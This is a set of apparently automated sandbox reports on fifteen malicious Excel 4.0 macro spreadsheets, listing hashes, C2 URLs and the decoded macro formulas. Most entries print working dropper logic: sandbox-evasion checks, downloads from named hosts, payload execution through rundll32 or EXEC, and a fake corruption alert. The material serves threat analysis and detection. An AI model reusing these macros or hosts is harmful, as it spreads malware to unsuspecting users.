{"version":"0.2","sample":{"sample":"","kind":"file","target":"46f19045051de7f527e493d5bfccbc5026a8c650d408be6645c9e526ea947fd5"},"analysis":{"reported":"2020-04-09T16:16:07Z","score":10},"files":[{"filename":"46f19045051de7f527e493d5bfccbc5026a8c650d408be6645c9e526ea947fd5","filesize":168448,"md5":"a6a7fcb8a8a1f7dc795685def024b8d1","sha1":"21bb2160f48041241053765cf8765150bd4f488d","sha256":"46f19045051de7f527e493d5bfccbc5026a8c650d408be6645c9e526ea947fd5","sha512":"a728b722940c0b90eaf725f02abdfc1e524e8d291d35dde411cb36e3e5cf690faf2b97d836ccda5f478725acdb39dde2cc690f2d699d8d49c95fc24b7cfeb1dd","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"46f19045051de7f527e493d5bfccbc5026a8c650d408be6645c9e526ea947fd5.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://cdncloudtech.xyz/bag4hy","https://waitupdate.xyz/deg34g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cdncloudtech.xyz/bag4hy\",\"c:\\Users\\Public\\cogp5yf.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://waitupdate.xyz/deg34g\",\"c:\\Users\\Public\\cogp5yf.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cogp5yf.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"GZnoUksOg9\",TRUE)\nGOTO(R$0C$11)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"47118239328b985157a6b39dc42cf246ca01f04865a9a332d8f73aac2ab3f4fd"},"analysis":{"reported":"2020-04-09T16:16:07Z","score":10},"files":[{"filename":"47118239328b985157a6b39dc42cf246ca01f04865a9a332d8f73aac2ab3f4fd","filesize":206336,"md5":"2079ef54b331db5614e17d54afe4d628","sha1":"baf319ff5b6b4bd271c2bf80f431f14b821f1f11","sha256":"47118239328b985157a6b39dc42cf246ca01f04865a9a332d8f73aac2ab3f4fd","sha512":"7fd8dae78800871151c1fcaa4f503e707e618379db539b1323c6df8a1d361834151aeb9a6a409e60d0b36bafaa5663293fad026110e91417ca9a5362aa0d45dc","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"47118239328b985157a6b39dc42cf246ca01f04865a9a332d8f73aac2ab3f4fd.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"ZU9MHZZ610\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"473332efcf7fc6b8f3e18a1585b85feb7fb74964238285602b0928d7644d58d5"},"analysis":{"reported":"2020-04-09T16:16:07Z","score":10},"files":[{"filename":"473332efcf7fc6b8f3e18a1585b85feb7fb74964238285602b0928d7644d58d5","filesize":214528,"md5":"d51a34450b40bdf821cd1773be8f7de5","sha1":"644c8f3e8f7a2f221379c7e3f4db11fb55e86207","sha256":"473332efcf7fc6b8f3e18a1585b85feb7fb74964238285602b0928d7644d58d5","sha512":"f5abea3f5e8e9c786395bf0824b8681dd7c13f1a496789285be7ea7341902b1e3345f60ecebb2de365a6b562c55a97f83bbf3510070515d4dfc975ff3bc0c0a7","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"473332efcf7fc6b8f3e18a1585b85feb7fb74964238285602b0928d7644d58d5.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://amgdorie.online/avdv43g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://amgdorie.online/avdv43g\",\"c:\\Users\\Public\\bug75ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug75ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"OAdjvDSrFm\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"4745242ac1e4d2c42231844b24018b66e5801fc1c71a0833566dc53fdeddbeca"},"analysis":{"reported":"2020-04-09T16:16:07Z","score":10},"files":[{"filename":"4745242ac1e4d2c42231844b24018b66e5801fc1c71a0833566dc53fdeddbeca","filesize":145920,"md5":"977f0e430525e9ab252fc61a8522eff5","sha1":"cd0b6e16bf7b1d05ab5a4110e00b67bf11b531ba","sha256":"4745242ac1e4d2c42231844b24018b66e5801fc1c71a0833566dc53fdeddbeca","sha512":"c5d274ea100b2afa2caa33decf69797cee5585e775e79a752dff8d6259a963620c032aed410487c7d88e0c5c82fb16c0661e095564340cf72bdc6968992d6d05","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"4745242ac1e4d2c42231844b24018b66e5801fc1c71a0833566dc53fdeddbeca.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://uenoeakd.site/grwrg24g2g"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$1C$0\u003c770,CLOSE(FALSE),)\nIF(R$2C$0\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nGET.WORKSPACE(26)\nRETURN()\nRETURN()\nRETURN()\nGOTO(R$0C$2)\nRETURN()\nWORKBOOK.HIDE(\"JU7pYLg0jL\",TRUE)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"476c537d1e420faf76484e51e8b274784feec0bdacd730d255ecfbddf244bd17"},"analysis":{"reported":"2020-04-09T16:16:07Z","score":10},"files":[{"filename":"476c537d1e420faf76484e51e8b274784feec0bdacd730d255ecfbddf244bd17","filesize":144384,"md5":"43bc7fdac1918013d415483fc44673ab","sha1":"09a471ef0c50e1da1d21eb5ee10ab256a4060aae","sha256":"476c537d1e420faf76484e51e8b274784feec0bdacd730d255ecfbddf244bd17","sha512":"72165460b6af3ef9249b5f5a091dc0dedcd65b2dcfe45e3d09cb43c2fc51d3448e4872b3a682f92dc7b24273b447b348d131e4a4c3a3e181c4d317a71fc3805e","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"476c537d1e420faf76484e51e8b274784feec0bdacd730d255ecfbddf244bd17.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://tdvomds.pw/12341324rfefv"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"pQtKfbyR6C\",TRUE)\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$23C$7\u003c770,CLOSE(FALSE),)\nIF(R$24C$7\u003c381,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nGOTO(R$53C$14)\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"47790cc3586cc41512bc6ceac5112c2440263e83908fe7dc9d5a40e095062da1"},"analysis":{"reported":"2020-04-09T16:16:07Z","score":10},"files":[{"filename":"47790cc3586cc41512bc6ceac5112c2440263e83908fe7dc9d5a40e095062da1","filesize":116224,"md5":"0cc12f38f107349857a54b71ddb4a742","sha1":"b1482cd0a96a87c1981d3989ca2143e6812bcc56","sha256":"47790cc3586cc41512bc6ceac5112c2440263e83908fe7dc9d5a40e095062da1","sha512":"f6b213dca98996b6d784ddd2c92abe3c312d4f562609c7425bc5dc42c4247088d3ef88d2779dc4a2453232519d919b27d0f86b6049c1e7e2bb51415dcb8899fa","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"47790cc3586cc41512bc6ceac5112c2440263e83908fe7dc9d5a40e095062da1.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://pxdgcvnsb.xyz/aaeg4df12"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://pxdgcvnsb.xyz/aaeg4df12\",\"c:\\Users\\Public\\cwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"JkjikzOf1N\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"477b89687a68e286c61e1c9b1fb28cc3784f4db2da621edff02c23b39b2123ee"},"analysis":{"reported":"2020-04-09T16:16:07Z","score":10},"files":[{"filename":"477b89687a68e286c61e1c9b1fb28cc3784f4db2da621edff02c23b39b2123ee","filesize":116224,"md5":"3ec7cf7ec07d0ce4f478263073b05354","sha1":"ea914737473007965e064202b155c5425fdd8cd7","sha256":"477b89687a68e286c61e1c9b1fb28cc3784f4db2da621edff02c23b39b2123ee","sha512":"63dec4fe71fb084a324aa4bdb2125b2cea9f7430f27de2d372a2300f37bf030daeaa8d6597295a06ac8a410634318932d25ca5ec96328c1f21658a15574d52f4","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"477b89687a68e286c61e1c9b1fb28cc3784f4db2da621edff02c23b39b2123ee.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://pxdgcvnsb.xyz/aaeg4df12"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://pxdgcvnsb.xyz/aaeg4df12\",\"c:\\Users\\Public\\cwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"0iKGfO5TzT\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"4797b8f26908b4c288a2182da9b303cf215db9423c751a3e6510bfe7b092a73e"},"analysis":{"reported":"2020-04-09T16:16:07Z","score":10},"files":[{"filename":"4797b8f26908b4c288a2182da9b303cf215db9423c751a3e6510bfe7b092a73e","filesize":170496,"md5":"73c8488cf8705bcc53dcec7493c2b4ef","sha1":"ebc87870487e1ff8be750c9c044177d45e7d16ac","sha256":"4797b8f26908b4c288a2182da9b303cf215db9423c751a3e6510bfe7b092a73e","sha512":"326478afc34b9206062e8b334c2f2e6cc49ca2688674de18ae87643c5d65748547a9391a0f8fb16b007caf0eef98c93b50f23906c07296492c69176f4c58f6c5","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"4797b8f26908b4c288a2182da9b303cf215db9423c751a3e6510bfe7b092a73e.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\fef2fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"7EWZuIzcx5\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"479eed8a7736128fe95cdb00423f7c38fe32c5a00b8da55f0467d274f433751a"},"analysis":{"reported":"2020-04-09T16:16:07Z","score":10},"files":[{"filename":"479eed8a7736128fe95cdb00423f7c38fe32c5a00b8da55f0467d274f433751a","filesize":160768,"md5":"80a62a8984b49919755d81b5a59d5276","sha1":"a754ecf1f4d6568068697c4409e3474c65f6caa4","sha256":"479eed8a7736128fe95cdb00423f7c38fe32c5a00b8da55f0467d274f433751a","sha512":"e17848471b3127dbebb557382c74778af6ffb927ccb4de647ef6cd7fa023e512ba6876e358f5cce32222280b0e6b6d10ddf291125f07418ac5ebe16e7b85d380","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"479eed8a7736128fe95cdb00423f7c38fe32c5a00b8da55f0467d274f433751a.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://cdncloudtech.xyz/deg34g","https://waitupdate.xyz/deg34g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cdncloudtech.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://waitupdate.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cmgp5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"fYZ2z2pNo5\",TRUE)\nGOTO(R$0C$11)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"47a2994b718afea905e24cd40f02f524d76536caae80cc156c35f9b360a9831c"},"analysis":{"reported":"2020-04-09T16:16:07Z","score":10},"files":[{"filename":"47a2994b718afea905e24cd40f02f524d76536caae80cc156c35f9b360a9831c","filesize":170496,"md5":"41ea3aad9bbacedd4cfaea95187376b4","sha1":"70d3bcc52f88436dfc360976d948bedc7d09c21d","sha256":"47a2994b718afea905e24cd40f02f524d76536caae80cc156c35f9b360a9831c","sha512":"6e5f828e32875ccb2e56818b673ab6eeecd037f23c9a724b0578c216910d40e9beb74f5bae42b0243d51c4738cd6f3dba451f02227f1799e160204d5c24142fa","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"47a2994b718afea905e24cd40f02f524d76536caae80cc156c35f9b360a9831c.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\fef2fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"adphXhHBrB\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"47a4ea67d77348dbec98e5f77043721e03ad63a31d0192b336479807bc69257e"},"analysis":{"reported":"2020-04-09T16:16:07Z","score":10},"files":[{"filename":"47a4ea67d77348dbec98e5f77043721e03ad63a31d0192b336479807bc69257e","filesize":185344,"md5":"628ac78c1d943fa84eb1133ba762d22c","sha1":"845663c04bb9a537a6d8e0cbf8a9d3f0003c0745","sha256":"47a4ea67d77348dbec98e5f77043721e03ad63a31d0192b336479807bc69257e","sha512":"3d88c9e1bebf2112ed73bda39d92ca8dc940763e51e10209db3c400aa3439546b3e3a61a5fa87133ee3d28aaf34ce3d3ba1772960d079acaeffdfa18e68b7b32","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"47a4ea67d77348dbec98e5f77043721e03ad63a31d0192b336479807bc69257e.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://merystol.xyz/DVkjbsdv37"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"47ab83350f903c97650b8b2b08e6136b8169fe6d7861603e226867e9077f6552"},"analysis":{"reported":"2020-04-09T16:16:07Z","score":10},"files":[{"filename":"47ab83350f903c97650b8b2b08e6136b8169fe6d7861603e226867e9077f6552","filesize":185344,"md5":"29112be6ad02a974eee70d1da339fbe0","sha1":"4cff3aa4ff68d45422516b2d51081da8d4f8216f","sha256":"47ab83350f903c97650b8b2b08e6136b8169fe6d7861603e226867e9077f6552","sha512":"f6c4b60c288502f78776cdf4b5a2688bdcabc599d6e6fd71e83a0b320f24b2f06951074678b9f170ff3c3ff995cae715bc17a883de02edd2166046898c5d8816","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"47ab83350f903c97650b8b2b08e6136b8169fe6d7861603e226867e9077f6552.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://merystol.xyz/6ng688x8"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"47bf49fd1db5513465b7ecbfd136fd2bf6fb907956e2519ebcb235a1ad46e702"},"analysis":{"reported":"2020-04-09T16:16:07Z","score":10},"files":[{"filename":"47bf49fd1db5513465b7ecbfd136fd2bf6fb907956e2519ebcb235a1ad46e702","filesize":185344,"md5":"d47863b6e28c42309c639115fa42f6b7","sha1":"b9c9ff971b0d6140b688f0852636ee50c6cb0bc0","sha256":"47bf49fd1db5513465b7ecbfd136fd2bf6fb907956e2519ebcb235a1ad46e702","sha512":"2e8ee07f711c7ed0f3b8d46c96fd545264e127998cca77810aabf4721b04c08ea8f6aa319e096d18f5886ffd223a67544ac31fa6e76f2cf38b24f4ff5832b615","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"47bf49fd1db5513465b7ecbfd136fd2bf6fb907956e2519ebcb235a1ad46e702.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://merystol.xyz/6ng688x8"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"47d84260a4becb6a7afc073613c773e8240d9c05da9513f96d937d8f3669a4f8"},"analysis":{"reported":"2020-04-09T16:16:07Z","score":10},"files":[{"filename":"47d84260a4becb6a7afc073613c773e8240d9c05da9513f96d937d8f3669a4f8","filesize":113664,"md5":"1387b58f4c2136465d3986ae52c904b3","sha1":"1e0632c6b463e7d3f22ed36c5f8d54a231a5a34a","sha256":"47d84260a4becb6a7afc073613c773e8240d9c05da9513f96d937d8f3669a4f8","sha512":"2b8b5663d2a25c90796e7375eae6975e13b6319fe6433b73d86493efc0c2ed9b2d3d76ff116962324a49ff7aadb9be1dbdb648fb4e1b2c8096076ed6fff16ee9","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"47d84260a4becb6a7afc073613c773e8240d9c05da9513f96d937d8f3669a4f8.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://samphaopet.com/wp-content/uploads/2020/02/idle/111111.png","http://icietdemain.fr/contents/2020/02/idle/222222.png","http://careers.sorint.it/idle/33333.png","http://uniluisgpaez.edu.co/wp-content/uploads/2020/02/idle/444444.png"],"attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$1C$0\u003c770,CLOSE(FALSE),)\nIF(R$2C$0\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nCALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://samphaopet.com/wp-content/uploads/2020/02/idle/111111.png\",\"c:\\Users\\Public\\asd2asff32.exe\",0,0)\nIF(R$6C$0\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://icietdemain.fr/contents/2020/02/idle/222222.png\",\"c:\\Users\\Public\\asd2asff32.exe\",0,0),GOTO(EXEC(\"c:\\Users\\Public\\asd2asff32.exe\")))\nIF(R$7C$0\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://careers.sorint.it/idle/33333.png\",\"c:\\Users\\Public\\asd2asff32.exe\",0,0),GOTO(EXEC(\"c:\\Users\\Public\\asd2asff32.exe\")))\nIF(R$8C$0\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://uniluisgpaez.edu.co/wp-content/uploads/2020/02/idle/444444.png\",\"c:\\Users\\Public\\asd2asff32.exe\",0,0),GOTO(EXEC(\"c:\\Users\\Public\\asd2asff32.exe\")))\nIF(R$9C$0\u003c0,CLOSE(FALSE),)\nEXEC(\"c:\\Users\\Public\\asd2asff32.exe\")\nALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.\",2)\nCLOSE(FALSE)\nWORKBOOK.HIDE(\"809yW1RMwD\",TRUE)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"47e69953d07541e77a7af0e5763c1d1c9738d0bda61b00bdcbd203bd6330779c"},"analysis":{"reported":"2020-04-09T16:16:07Z","score":10},"files":[{"filename":"47e69953d07541e77a7af0e5763c1d1c9738d0bda61b00bdcbd203bd6330779c","filesize":147968,"md5":"fb55f8c5eb624d09941fa34971dcef41","sha1":"6035878c7c48c7604c07c0f877a0511dd4c6038a","sha256":"47e69953d07541e77a7af0e5763c1d1c9738d0bda61b00bdcbd203bd6330779c","sha512":"b3116e94f6edf984efe0334a7d3d89ab72afce17c2c789abca20b7f47b46fec1ede1154b4987cb72b776055c2c3b42cab178d5d6121cb94b92153e5c9ec7955c","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"47e69953d07541e77a7af0e5763c1d1c9738d0bda61b00bdcbd203bd6330779c.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://hxzfvomd.buzz/asf2f1ff"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$1C$0\u003c770,CLOSE(FALSE),)\nIF(R$2C$0\u003c381,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nGET.WORKSPACE(26)\nRETURN()\nRETURN()\nRETURN()\nGOTO(R$0C$2)\nRETURN()\nWORKBOOK.HIDE(\"QT2bBQnUzf\",TRUE)"}}}]}
